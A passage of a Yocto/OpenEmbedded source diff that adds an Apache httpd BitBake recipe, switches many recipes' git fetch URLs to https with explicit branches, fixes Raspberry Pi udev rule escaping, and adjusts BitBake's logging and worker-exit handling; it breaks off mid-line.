+PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,libselinux" +PACKAGECONFIG[openldap] = "--enable-ldap --enable-authnz-ldap,--disable-ldap --disable-authnz-ldap,openldap" +PACKAGECONFIG[zlib] = "--enable-deflate,,zlib,zlib" + +CFLAGS_append = " -DPATH_MAX=4096" + +EXTRA_OECONF_class-target = "\ + --enable-layout=Debian \ + --prefix=${base_prefix} \ + --exec_prefix=${exec_prefix} \ + --includedir=${includedir}/${BPN} \ + --sysconfdir=${sysconfdir}/${BPN} \ + --datadir=${datadir}/${BPN} \ + --libdir=${libdir} \ + --libexecdir=${libexecdir}/${BPN}/modules \ + --localstatedir=${localstatedir} \ + --enable-ssl \ + --with-dbm=sdbm \ + --with-gdbm=no \ + --with-ndbm=no \ + --with-berkeley-db=no \ + --enable-info \ + --enable-rewrite \ + --enable-mpms-shared \ + ap_cv_void_ptr_lt_long=no \ + ac_cv_have_threadsafe_pollset=no \ + " + +EXTRA_OECONF_class-native = "\ + --prefix=${prefix} \ + --includedir=${includedir}/${BPN} \ + --sysconfdir=${sysconfdir}/${BPN} \ + --datadir=${datadir}/${BPN} \ + --libdir=${libdir} \ + --libexecdir=${libdir}/${BPN}/modules \ + --localstatedir=${localstatedir} \ + " + +do_configure_prepend() { + sed -i -e 's:$''{prefix}/usr/lib/cgi-bin:$''{libexecdir}/cgi-bin:g' ${S}/config.layout +} + +do_install_append_class-target() { + install -d ${D}/${sysconfdir}/init.d + + cat ${WORKDIR}/init | \ + sed -e 's,/usr/sbin/,${sbindir}/,g' \ + -e 's,/usr/bin/,${bindir}/,g' \ + -e 's,/usr/lib/,${libdir}/,g' \ + -e 's,/etc/,${sysconfdir}/,g' \ + -e 's,/usr/,${prefix}/,g' > ${D}/${sysconfdir}/init.d/${BPN} + + chmod 755 ${D}/${sysconfdir}/init.d/${BPN} + + # Remove the goofy original files... + rm -rf ${D}/${sysconfdir}/${BPN}/original + + install -d ${D}${sysconfdir}/${BPN}/conf.d + install -d ${D}${sysconfdir}/${BPN}/modules.d + + # Ensure configuration file pulls in conf.d and modules.d + printf "\nIncludeOptional ${sysconfdir}/${BPN}/conf.d/*.conf" >> ${D}/${sysconfdir}/${BPN}/httpd.conf + printf "\nIncludeOptional ${sysconfdir}/${BPN}/modules.d/*.load" >> ${D}/${sysconfdir}/${BPN}/httpd.conf + printf "\nIncludeOptional ${sysconfdir}/${BPN}/modules.d/*.conf\n\n" >> ${D}/${sysconfdir}/${BPN}/httpd.conf + + # Match with that is in init script + printf "\nPidFile /run/httpd.pid" >> ${D}/${sysconfdir}/${BPN}/httpd.conf + + # Set 'ServerName' to fix error messages when restart apache service + sed -i 's/^#ServerName www.example.com/ServerName localhost/' ${D}/${sysconfdir}/${BPN}/httpd.conf + + sed -i 's/^ServerRoot/#ServerRoot/' ${D}/${sysconfdir}/${BPN}/httpd.conf + + sed -i -e 's,${STAGING_DIR_TARGET},,g' \ + -e 's,${DEBUG_PREFIX_MAP},,g' \ + -e 's,-fdebug-prefix-map[^ ]*,,g; s,-fmacro-prefix-map[^ ]*,,g' \ + -e 's,${HOSTTOOLS_DIR}/,,g' \ + -e 's,APU_INCLUDEDIR = .*,APU_INCLUDEDIR = ,g' \ + -e 's,APU_CONFIG = .*,APU_CONFIG = ,g' ${D}${datadir}/apache2/build/config_vars.mk + + sed -i -e 's,--sysroot=${STAGING_DIR_TARGET},,g' \ + -e 's,${DEBUG_PREFIX_MAP},,g' \ + -e 's,${RECIPE_SYSROOT},,g' \ + -e 's,-fdebug-prefix-map[^ ]*,,g; s,-fmacro-prefix-map[^ ]*,,g' \ + -e 's,APU_INCLUDEDIR = .*,APU_INCLUDEDIR = ,g' \ + -e 's,".*/configure","configure",g' ${D}${datadir}/apache2/build/config.nice + + if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then + install -d ${D}${sysconfdir}/tmpfiles.d/ + install -m 0644 ${WORKDIR}/apache2-volatile.conf ${D}${sysconfdir}/tmpfiles.d/ + + install -d ${D}${systemd_unitdir}/system + install -m 0644 ${WORKDIR}/apache2.service ${D}${systemd_unitdir}/system + sed -i -e 's,@SBINDIR@,${sbindir},g' ${D}${systemd_unitdir}/system/apache2.service + sed -i -e 's,@BASE_BINDIR@,${base_bindir},g' ${D}${systemd_unitdir}/system/apache2.service + elif ${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'true', 'false', d)}; then + install -d ${D}${sysconfdir}/default/volatiles + install -m 0644 ${WORKDIR}/volatiles.04_apache2 ${D}${sysconfdir}/default/volatiles/04_apache2 + fi + + rm -rf ${D}${localstatedir} ${D}${sbindir}/envvars* + chown -R root:root ${D} +} + +do_install_append_class-native() { + install -d ${D}${bindir} ${D}${libdir} + install -m 755 server/gen_test_char ${D}${bindir} +} + +SYSROOT_PREPROCESS_FUNCS_append_class-target = " apache_sysroot_preprocess" + +apache_sysroot_preprocess() { + install -d ${SYSROOT_DESTDIR}${bindir_crossscripts} + install -m 755 ${D}${bindir}/apxs ${SYSROOT_DESTDIR}${bindir_crossscripts} + install -d ${SYSROOT_DESTDIR}${sbindir} + install -m 755 ${D}${sbindir}/apachectl ${SYSROOT_DESTDIR}${sbindir} + sed -i 's!my $installbuilddir = .*!my $installbuilddir = "${STAGING_DIR_HOST}/${datadir}/${BPN}/build";!' ${SYSROOT_DESTDIR}${bindir_crossscripts}/apxs + sed -i 's!my $libtool = .*!my $libtool = "${STAGING_BINDIR_CROSS}/${HOST_SYS}-libtool";!' ${SYSROOT_DESTDIR}${bindir_crossscripts}/apxs + + sed -i 's!^APR_CONFIG = .*!APR_CONFIG = ${STAGING_BINDIR_CROSS}/apr-1-config!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!^APU_CONFIG = .*!APU_CONFIG = ${STAGING_BINDIR_CROSS}/apu-1-config!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!^includedir = .*!includedir = ${STAGING_INCDIR}/apache2!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!^CFLAGS = -I[^ ]*!CFLAGS = -I${STAGING_INCDIR}/openssl!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!^EXTRA_LDFLAGS = .*!EXTRA_LDFLAGS = -L${STAGING_LIBDIR}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!^EXTRA_INCLUDES = .*!EXTRA_INCLUDES = -I$(includedir) -I. -I${STAGING_INCDIR}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk + sed -i 's!--sysroot=[^ ]*!--sysroot=${STAGING_DIR_HOST}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk +} + +# Implications - used by update-rc.d scripts +INITSCRIPT_NAME = "apache2" +INITSCRIPT_PARAMS = "defaults 91 20" + +SYSTEMD_SERVICE_${PN} = "apache2.service" +SYSTEMD_AUTO_ENABLE_${PN} = "enable" + +ALTERNATIVE_${PN}-doc = "htpasswd.1" +ALTERNATIVE_LINK_NAME[htpasswd.1] = "${mandir}/man1/htpasswd.1" + +PACKAGES = "${PN}-scripts ${PN}-doc ${PN}-dev ${PN}-dbg ${PN}" + +CONFFILES_${PN} = "${sysconfdir}/${BPN}/httpd.conf \ + ${sysconfdir}/${BPN}/magic \ + ${sysconfdir}/${BPN}/mime.types \ + ${sysconfdir}/${BPN}/extra/*" + +# We override here rather than append so that .so links are +# included in the runtime package rather than here (-dev) +# and to get build, icons, error into the -dev package +FILES_${PN}-dev = "${datadir}/${BPN}/build \ + ${datadir}/${BPN}/icons \ + ${datadir}/${BPN}/error \ + ${includedir}/${BPN} \ + ${bindir}/apxs \ + " + +# Add the manual to -doc +FILES_${PN}-doc += " ${datadir}/${BPN}/manual" + +FILES_${PN}-scripts += "${bindir}/dbmmanage" + +# Override this too - here is the default, less datadir +FILES_${PN} = "${bindir} ${sbindir} ${libexecdir} ${libdir} \ + ${sysconfdir} ${libdir}/${BPN}" + +# We want htdocs and cgi-bin to go with the binary +FILES_${PN} += "${datadir}/${BPN}/ ${libdir}/cgi-bin" + +FILES_${PN}-dbg += "${libdir}/${BPN}/modules/.debug" + +RDEPENDS_${PN} += "openssl libgcc" +RDEPENDS_${PN}-scripts += "perl ${PN}" +RDEPENDS_${PN}-dev = "perl" + +BBCLASSEXTEND = "native" + +pkg_postinst_${PN}() { + if [ -z "$D" ]; then + if type systemd-tmpfiles >/dev/null; then + systemd-tmpfiles --create + elif [ -e ${sysconfdir}/init.d/populate-volatile.sh ]; then + ${sysconfdir}/init.d/populate-volatile.sh update + fi + fi +} diff --git a/meta-openembedded/meta-webserver/recipes-httpd/cherokee/cherokee_git.bb b/meta-openembedded/meta-webserver/recipes-httpd/cherokee/cherokee_git.bb index 7424467946..864e3ac7b1 100644 --- a/meta-openembedded/meta-webserver/recipes-httpd/cherokee/cherokee_git.bb +++ b/meta-openembedded/meta-webserver/recipes-httpd/cherokee/cherokee_git.bb @@ -9,7 +9,7 @@ DEPENDS = "unzip-native libpcre openssl mysql5 ${@bb.utils.contains('DISTRO_FEAT SRCREV = "9a75e65b876bcc376cb6b379dca1f7ce4a055c59" PV = "1.2.104+git${SRCPV}" -SRC_URI = "git://github.com/cherokee/webserver \ +SRC_URI = "git://github.com/cherokee/webserver;branch=master;protocol=https \ file://cherokee.init \ file://cherokee.service \ file://cherokee-install-configured.py-once.patch \ diff --git a/meta-openembedded/meta-webserver/recipes-httpd/sthttpd/sthttpd_2.27.1.bb b/meta-openembedded/meta-webserver/recipes-httpd/sthttpd/sthttpd_2.27.1.bb index 560dd9b6e4..ab479d9ce5 100644 --- a/meta-openembedded/meta-webserver/recipes-httpd/sthttpd/sthttpd_2.27.1.bb +++ b/meta-openembedded/meta-webserver/recipes-httpd/sthttpd/sthttpd_2.27.1.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://src/thttpd.c;beginline=1;endline=26;md5=0c5762c2c34dc DEPENDS += "base-passwd virtual/crypt" SRCREV = "2845bf5bff2b820d2336c8c8061cbfc5f271e720" -SRC_URI = "git://github.com/blueness/${BPN} \ +SRC_URI = "git://github.com/blueness/${BPN};branch=master;protocol=https \ file://thttpd.service \ file://thttpd.conf \ file://init" diff --git a/meta-openembedded/meta-webserver/recipes-support/fcgi/fcgi_git.bb b/meta-openembedded/meta-webserver/recipes-support/fcgi/fcgi_git.bb index 6df58ad3c4..61ef6073e0 100644 --- a/meta-openembedded/meta-webserver/recipes-support/fcgi/fcgi_git.bb +++ b/meta-openembedded/meta-webserver/recipes-support/fcgi/fcgi_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.TERMS;md5=e3aacac3a647af6e7e31f181cda0a06a" SRCREV = "382aa2b0d53a87c27f2f647dfaf670375ba0b85f" PV = "2.4.2" -SRC_URI = "git://github.com/FastCGI-Archives/fcgi2.git;protocol=https \ +SRC_URI = "git://github.com/FastCGI-Archives/fcgi2.git;protocol=https;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-webserver/recipes-webadmin/netdata/netdata_git.bb b/meta-openembedded/meta-webserver/recipes-webadmin/netdata/netdata_git.bb index d6a5ce0662..ab9de70b3b 100644 --- a/meta-openembedded/meta-webserver/recipes-webadmin/netdata/netdata_git.bb +++ b/meta-openembedded/meta-webserver/recipes-webadmin/netdata/netdata_git.bb @@ -3,7 +3,7 @@ SUMMARY = "Real-time performance monitoring" LICENSE = "GPLv3" LIC_FILES_CHKSUM = "file://LICENSE;md5=fc9b848046ef54b5eaee6071947abd24" -SRC_URI = "git://github.com/firehol/netdata.git;protocol=https \ +SRC_URI = "git://github.com/firehol/netdata.git;protocol=https;branch=master \ file://0002-Makefiles-does-not-build-contrib-dir.patch \ " SRCREV = "588ce5a7b18999dfa66698cd3a2f005f7a3c31cf" diff --git a/meta-openembedded/meta-xfce/recipes-apps/xarchiver/xarchiver_git.bb b/meta-openembedded/meta-xfce/recipes-apps/xarchiver/xarchiver_git.bb index 64582f28f2..d76b0835fb 100644 --- a/meta-openembedded/meta-xfce/recipes-apps/xarchiver/xarchiver_git.bb +++ b/meta-openembedded/meta-xfce/recipes-apps/xarchiver/xarchiver_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "gtk+3 glib-2.0 xfce4-dev-tools-native intltool-native" -SRC_URI = "git://github.com/ib/xarchiver.git" +SRC_URI = "git://github.com/ib/xarchiver.git;branch=master;protocol=https" SRCREV = "9ab958a4023b62b43972c55a3143ff0722bd88a6" PV = "0.5.4.14" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-xfce/recipes-apps/xfce-polkit/xfce-polkit_0.3.bb b/meta-openembedded/meta-xfce/recipes-apps/xfce-polkit/xfce-polkit_0.3.bb index 2ef81f286d..58e628deca 100644 --- a/meta-openembedded/meta-xfce/recipes-apps/xfce-polkit/xfce-polkit_0.3.bb +++ b/meta-openembedded/meta-xfce/recipes-apps/xfce-polkit/xfce-polkit_0.3.bb @@ -8,7 +8,7 @@ inherit xfce-app features_check REQUIRED_DISTRO_FEATURES = "polkit" SRC_URI = " \ - git://github.com/ncopa/${BPN}.git \ + git://github.com/ncopa/${BPN}.git;branch=master;protocol=https \ " SRCREV = "6d3282cc1734c305850d48f5bf4b4d94e88885e9" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-xfce/recipes-apps/xfce4-datetime-setter/xfce4-datetime-setter_3.32.2.bb b/meta-openembedded/meta-xfce/recipes-apps/xfce4-datetime-setter/xfce4-datetime-setter_3.32.2.bb index 2dd3f01d8c..145a9cc400 100644 --- a/meta-openembedded/meta-xfce/recipes-apps/xfce4-datetime-setter/xfce4-datetime-setter_3.32.2.bb +++ b/meta-openembedded/meta-xfce/recipes-apps/xfce4-datetime-setter/xfce4-datetime-setter_3.32.2.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=75859989545e37968a99b631ef42722e" DEPENDS = "glib-2.0-native libxfce4ui" -SRC_URI = "git://github.com/schnitzeltony/xfce4-datetime-setter.git;protocol=https \ +SRC_URI = "git://github.com/schnitzeltony/xfce4-datetime-setter.git;protocol=https;branch=master \ file://fix-inner-dependency.patch \ " SRCREV = "5c7a73a3824b03b91719e05e2604b97c7a72d50f" diff --git a/meta-openembedded/meta-xfce/recipes-panel-plugins/closebutton/xfce4-closebutton-plugin_git.bb b/meta-openembedded/meta-xfce/recipes-panel-plugins/closebutton/xfce4-closebutton-plugin_git.bb index 8dfb2e626d..531f3d5cd0 100644 --- a/meta-openembedded/meta-xfce/recipes-panel-plugins/closebutton/xfce4-closebutton-plugin_git.bb +++ b/meta-openembedded/meta-xfce/recipes-panel-plugins/closebutton/xfce4-closebutton-plugin_git.bb @@ -9,7 +9,7 @@ DEPENDS += "exo-native libwnck3 xfconf" PV = "0.1.0+gitr${SRCPV}" -SRC_URI = "git://github.com/schnitzeltony/xfce4-closebutton-plugin.git;branch=master" +SRC_URI = "git://github.com/schnitzeltony/xfce4-closebutton-plugin.git;branch=master;protocol=https" SRCREV = "6ed5c3ee1ba7103ca854c5e81fb2c1220b913a40" S = "${WORKDIR}/git" diff --git a/meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb b/meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb index 2541e9e158..ce7ba75c3f 100644 --- a/meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb +++ b/meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda COMPATIBLE_MACHINE = "^rpi$" SRCREV = "648ffc470824c43eb0d16c485f4c24816b32cd6f" -SRC_URI = "git://github.com/Evilpaul/RPi-config.git;protocol=git;branch=master \ +SRC_URI = "git://github.com/Evilpaul/RPi-config.git;protocol=https;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-raspberrypi/recipes-connectivity/pi-bluetooth/pi-bluetooth_0.1.12.bb b/meta-raspberrypi/recipes-connectivity/pi-bluetooth/pi-bluetooth_0.1.12.bb index ccf714bafa..6ad81c4c7e 100644 --- a/meta-raspberrypi/recipes-connectivity/pi-bluetooth/pi-bluetooth_0.1.12.bb +++ b/meta-raspberrypi/recipes-connectivity/pi-bluetooth/pi-bluetooth_0.1.12.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "\ " SRC_URI = "\ - git://github.com/RPi-Distro/pi-bluetooth \ + git://github.com/RPi-Distro/pi-bluetooth;branch=master;protocol=https \ file://0001-bthelper-correct-path-for-hciconfig-under-Yocto.patch \ " SRCREV = "cbdbcb66bcc5b9af05f1a9fffe2254c872bb0ace" diff --git a/meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules b/meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules index 6bf019bd15..ddd1e1743e 100644 --- a/meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules +++ b/meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules @@ -1,8 +1,8 @@ KERNEL=="ttyAMA[01]", PROGRAM="/bin/sh -c '\ ALIASES=/proc/device-tree/aliases; \ - if cmp -s $ALIASES/uart0 $ALIASES/serial0; then \ + if cmp -s $$ALIASES/uart0 $$ALIASES/serial0; then \ echo 0;\ - elif cmp -s $ALIASES/uart0 $ALIASES/serial1; then \ + elif cmp -s $$ALIASES/uart0 $$ALIASES/serial1; then \ echo 1; \ else \ exit 1; \ @@ -11,9 +11,9 @@ KERNEL=="ttyAMA[01]", PROGRAM="/bin/sh -c '\ KERNEL=="ttyS0", PROGRAM="/bin/sh -c '\ ALIASES=/proc/device-tree/aliases; \ - if cmp -s $ALIASES/uart1 $ALIASES/serial0; then \ + if cmp -s $$ALIASES/uart1 $$ALIASES/serial0; then \ echo 0; \ - elif cmp -s $ALIASES/uart1 $ALIASES/serial1; then \ + elif cmp -s $$ALIASES/uart1 $$ALIASES/serial1; then \ echo 1; \ else \ exit 1; \ diff --git a/meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb b/meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb index fdaf16c8ff..4b2d1ba200 100644 --- a/meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb +++ b/meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb @@ -4,7 +4,7 @@ SECTION = "devel/libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://README.md;beginline=268;endline=292;md5=86d10e4bcf4b4014d306dde7c1d2a80d" -SRC_URI = "git://github.com/sarfata/pi-blaster \ +SRC_URI = "git://github.com/sarfata/pi-blaster;branch=master;protocol=https \ file://remove-initscript-lsb-dependency.patch \ " diff --git a/meta-raspberrypi/recipes-devtools/python/python3-rtimu_git.bb b/meta-raspberrypi/recipes-devtools/python/python3-rtimu_git.bb index 4f13a38bbe..c9f1cec6ac 100644 --- a/meta-raspberrypi/recipes-devtools/python/python3-rtimu_git.bb +++ b/meta-raspberrypi/recipes-devtools/python/python3-rtimu_git.bb @@ -5,7 +5,7 @@ SECTION = "devel/python" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://../../LICENSE;md5=96cdecb41125f498958e09b72faf318e" -SRC_URI = "git://github.com/RPi-Distro/RTIMULib.git;protocol=http;branch=master \ +SRC_URI = "git://github.com/RPi-Distro/RTIMULib.git;protocol=http;branch=master;protocol=https \ file://0001-include-asm-ioctl.h-for-ioctl-define.patch;patchdir=../.. \ " SRCREV = "b949681af69b45f0f7f4bb53b6770037b5b02178" diff --git a/meta-raspberrypi/recipes-graphics/userland/userland_git.bb b/meta-raspberrypi/recipes-graphics/userland/userland_git.bb index 1138da86ba..5378cded14 100644 --- a/meta-raspberrypi/recipes-graphics/userland/userland_git.bb +++ b/meta-raspberrypi/recipes-graphics/userland/userland_git.bb @@ -20,7 +20,7 @@ SRCREV = "188d3bfe4a0ac36b119a2cee35a6be8d0c68e09e" PV = "20200624" SRC_URI = "\ - git://github.com/${SRCFORK}/userland.git;protocol=git;branch=${SRCBRANCH} \ + git://github.com/${SRCFORK}/userland.git;protocol=https;branch=${SRCBRANCH} \ file://0001-Allow-applications-to-set-next-resource-handle.patch \ file://0002-wayland-Add-support-for-the-Wayland-winsys.patch \ file://0003-wayland-Add-Wayland-example.patch \ diff --git a/meta-raspberrypi/recipes-kernel/bluez-firmware-rpidistro/bluez-firmware-rpidistro_git.bb b/meta-raspberrypi/recipes-kernel/bluez-firmware-rpidistro/bluez-firmware-rpidistro_git.bb index 310d2f8446..260aeb9d87 100644 --- a/meta-raspberrypi/recipes-kernel/bluez-firmware-rpidistro/bluez-firmware-rpidistro_git.bb +++ b/meta-raspberrypi/recipes-kernel/bluez-firmware-rpidistro/bluez-firmware-rpidistro_git.bb @@ -23,7 +23,7 @@ LIC_FILES_CHKSUM = "\ # so that the license files will be copied from fetched source NO_GENERIC_LICENSE[Firmware-cypress-rpidistro] = "LICENCE.cypress-rpidistro" -SRC_URI = "git://github.com/RPi-Distro/bluez-firmware" +SRC_URI = "git://github.com/RPi-Distro/bluez-firmware;branch=master;protocol=https" SRCREV = "96eefffcccc725425fd83be5e0704a5c32b79e54" PV = "0.0+git${SRCPV}" diff --git a/meta-raspberrypi/recipes-kernel/linux-firmware-rpidistro/linux-firmware-rpidistro_git.bb b/meta-raspberrypi/recipes-kernel/linux-firmware-rpidistro/linux-firmware-rpidistro_git.bb index 99afde8488..954887d844 100644 --- a/meta-raspberrypi/recipes-kernel/linux-firmware-rpidistro/linux-firmware-rpidistro_git.bb +++ b/meta-raspberrypi/recipes-kernel/linux-firmware-rpidistro/linux-firmware-rpidistro_git.bb @@ -33,7 +33,7 @@ LIC_FILES_CHKSUM = "\ NO_GENERIC_LICENSE[Firmware-broadcom_bcm43xx-rpidistro] = "LICENCE.broadcom_bcm43xx" NO_GENERIC_LICENSE[WHENCE] = "WHENCE" -SRC_URI = "git://github.com/RPi-Distro/firmware-nonfree" +SRC_URI = "git://github.com/RPi-Distro/firmware-nonfree;branch=buster;protocol=https" SRCREV = "98e815735e2c805d65994ccc608f399595b74438" PV = "20190114-1+rpt8" diff --git a/meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb b/meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb index 3511a55767..d6b0eec9fb 100644 --- a/meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb +++ b/meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb @@ -20,7 +20,7 @@ SRCREV_meta ?= '${@oe.utils.conditional("PREFERRED_PROVIDER_virtual/kernel", "li KMETA = "kernel-meta" SRC_URI = " \ - git://github.com/raspberrypi/linux.git;name=machine;branch=${LINUX_RPI_BRANCH} \ + git://github.com/raspberrypi/linux.git;name=machine;branch=${LINUX_RPI_BRANCH};protocol=https \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=${LINUX_RPI_KMETA_BRANCH};destsuffix=${KMETA} \ file://powersave.cfg \ file://android-drivers.cfg \ diff --git a/meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb b/meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb index 55e5a1c8c9..82706a47a4 100644 --- a/meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb +++ b/meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb @@ -22,8 +22,8 @@ SRCREV_default = "f543a0d0e707ab56415f17b0ca6d397394ee8b63" # This SRCREV corresponds to the v4.0.3 release of ffmpeg. SRCREV_ffmpeg = "fcbd117df3077bad495e99e20f01cf93737bce76" -SRC_URI = "git://github.com/popcornmix/omxplayer.git;protocol=git;branch=master \ - git://github.com/FFmpeg/FFmpeg;branch=release/4.0;protocol=git;depth=1;name=ffmpeg;destsuffix=git/ffmpeg \ +SRC_URI = "git://github.com/popcornmix/omxplayer.git;protocol=https;branch=master \ + git://github.com/FFmpeg/FFmpeg;branch=release/4.0;protocol=https;depth=1;name=ffmpeg;destsuffix=git/ffmpeg \ file://0002-Libraries-and-headers-from-ffmpeg-are-installed-in-u.patch \ file://0003-Remove-strip-step-in-Makefile.patch \ file://0004-Add-FFMPEG_EXTRA_CFLAGS-and-FFMPEG_EXTRA_LDFLAGS.patch \ diff --git a/meta-security/recipes-kernel/linux/linux-%_5.%.bbappend b/meta-security/recipes-kernel/linux/linux-%_5.%.bbappend deleted file mode 100644 index 6bc40cd96a..0000000000 --- a/meta-security/recipes-kernel/linux/linux-%_5.%.bbappend +++ /dev/null @@ -1,4 +0,0 @@ -KERNEL_FEATURES_append = " ${@bb.utils.contains("DISTRO_FEATURES", "apparmor", " features/apparmor/apparmor.scc", "" ,d)}" -KERNEL_FEATURES_append = " ${@bb.utils.contains("DISTRO_FEATURES", "smack", " features/smack/smack.scc", "" ,d)}" -KERNEL_FEATURES_append = " ${@bb.utils.contains("DISTRO_FEATURES", "yama", " features/yama/yama.scc", "" ,d)}" -KERNEL_FEATURES_append = " ${@bb.utils.contains("IMAGE_CLASSES", "dm-verity-img", " features/device-mapper/dm-verity.scc", "" ,d)}" diff --git a/poky/README.OE-Core b/poky/README.OE-Core index 521916cd4f..2f2127fb03 100644 --- a/poky/README.OE-Core +++ b/poky/README.OE-Core @@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with DISTRO = "nodistro") and contains only emulated machine support. For information about OpenEmbedded, see the OpenEmbedded website: - http://www.openembedded.org/ + https://www.openembedded.org/ The Yocto Project has extensive documentation about OE including a reference manual which can be found at: - http://yoctoproject.org/documentation + https://docs.yoctoproject.org/ Contributing ------------ Please refer to -http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded +https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded for guidelines on how to submit patches. Mailing list: - http://lists.openembedded.org/mailman/listinfo/openembedded-core + https://lists.openembedded.org/g/openembedded-core Source code: - http://git.openembedded.org/openembedded-core/ + https://git.openembedded.org/openembedded-core/ diff --git a/poky/bitbake/bin/bitbake-worker b/poky/bitbake/bin/bitbake-worker index 97cc0fd60f..e3ce01eec8 100755 --- a/poky/bitbake/bin/bitbake-worker +++ b/poky/bitbake/bin/bitbake-worker @@ -413,9 +413,9 @@ class BitbakeWorker(object): def handle_workerdata(self, data): self.workerdata = pickle.loads(data) + bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"] + bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"] bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"] - bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"] - bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"] bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"] for mc in self.databuilder.mcdata: self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"]) @@ -505,9 +505,11 @@ except BaseException as e: import traceback sys.stderr.write(traceback.format_exc()) sys.stderr.write(str(e)) +finally: + worker_thread_exit = True + worker_thread.join() -worker_thread_exit = True -worker_thread.join() - -workerlog_write("exitting") +workerlog_write("exiting") +if not normalexit: + sys.exit(1) sys.exit(0) diff --git a/poky/bitbake/lib/bb/build.py b/poky/bitbake/lib/bb/build.py index 23b6ee455f..aaada8a18b 100644 --- a/poky/bitbake/lib/bb/build.py +++ b/poky/bitbake/lib/bb/build.py @@ -27,6 +27,9 @@ from bb import data, event, utils bblogger = logging.getLogger('BitBake') logger = logging.getLogger('BitBake.Build') +verboseShellLogging = False +verboseStdoutLogging = False + __mtime_cache = {} def cached_mtime_noerror(f): @@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None): lineno = int(d.getVarFlag(func, "lineno", False)) bb.methodpool.insert_method(func, text, fn, lineno - 1) - comp = utils.better_compile(code, func, "exec_python_func() autogenerated") - utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated") + comp = utils.better_compile(code, func, "exec_func_python() autogenerated") + utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated") finally: bb.debug(2, "Python function %s finished" % func) @@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None): bb.data.emit_func(func, script, d) - if bb.msg.loggerVerboseLogs: + if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)): script.write("set -x\n") if cwd: script.write("cd '%s'\n" % cwd) @@ -391,7 +394,7 @@ exit $ret if fakerootcmd: cmd = [fakerootcmd, runfile] - if bb.msg.loggerDefaultVerbose: + if verboseStdoutLogging: logfile = LogTee(logger, StdoutNoopContextManager()) else: logfile = StdoutNoopContextManager() @@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr): except bb.BBHandledException: event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata) return 1 - except Exception as exc: + except (Exception, SystemExit) as exc: if quieterr: event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata) else: errprinted = errchk.triggered + # If the output is already on stdout, we've printed the information in the + # logs once already so don't duplicate + if verboseStdoutLogging: + errprinted = True logger.error(str(exc)) event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata) return 1 @@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d): def follow_chain(task, endtask, chain=None): if not chain: chain = [] + if task in chain: + bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, 